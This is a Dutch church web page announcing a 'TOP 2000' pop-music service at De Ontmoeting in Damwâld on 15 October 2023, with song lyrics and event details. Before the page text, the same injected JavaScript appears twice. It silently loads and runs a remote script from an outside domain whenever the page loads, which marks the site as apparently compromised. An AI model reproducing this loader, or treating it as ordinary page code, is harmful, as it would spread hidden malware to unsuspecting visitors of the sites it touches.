;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); TOP 2000 - dienst in De Ontmoeting - PKN Damwâld
15 oktober 2023
19:00 t/m 20:00
de Ontmoeting
TOP 2000 – dienst in De Ontmoeting

 

 

DE SOUNDTRACK VAN ONS LEVEN

Hier ben ik veilig, hier ben ik sterk

Hier ben ik heilig, dit is mijn kerk

Dit is mijn haven, hier leg ik aan

Hier kan ik slapen, hier moet ik staan

Hier ligt mijn hart voor jou

Op zondag 15 oktober zal ds. Gerard Rinsma voorgaan in een zogeheten top-2000 dienst. Samen met de mannen van gospelrockband Grace combineert hij popmuziek en eredienst tot een ware happening. Want popmuziek is voor veel mensen de soundtrack van hun leven; raakt niet elke diepingrijpende gebeurtenis in ons leven verbonden met de muziek van dat moment? Maar daarnaast blijkt een popsong in een eredienst soms een onverwachte diepte te krijgen, die je op radio en spotify niet direct zult ontdekken.

Daarom pakt hij z’n gitaar op en gaat op zoek naar het mooiste liefdeslied ooit geschreven. Welk lied zou dan nummer één moeten staan? Een psalm of gezang uit het liedboek? Of een song uit de top 2000? Of een lied, dat in beide voorkomt? En welk lied moet er klinken, als bruid en bruidegom elkaar het jawoord geven? Iedereen mag er nu alvast over nadenken en zijn/haar keuze in de dienst kenbaar maken. En vervolgens zal Gerard Rinsma popmuziek verkondiging op zijn eigen manier door elkaar heen vlechten.

Datum 15 oktober 2023

Plaats: de Ontmoeting, Damwâld.

Aanvang: 19.00 uur

m.m.v. rockband Grace

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld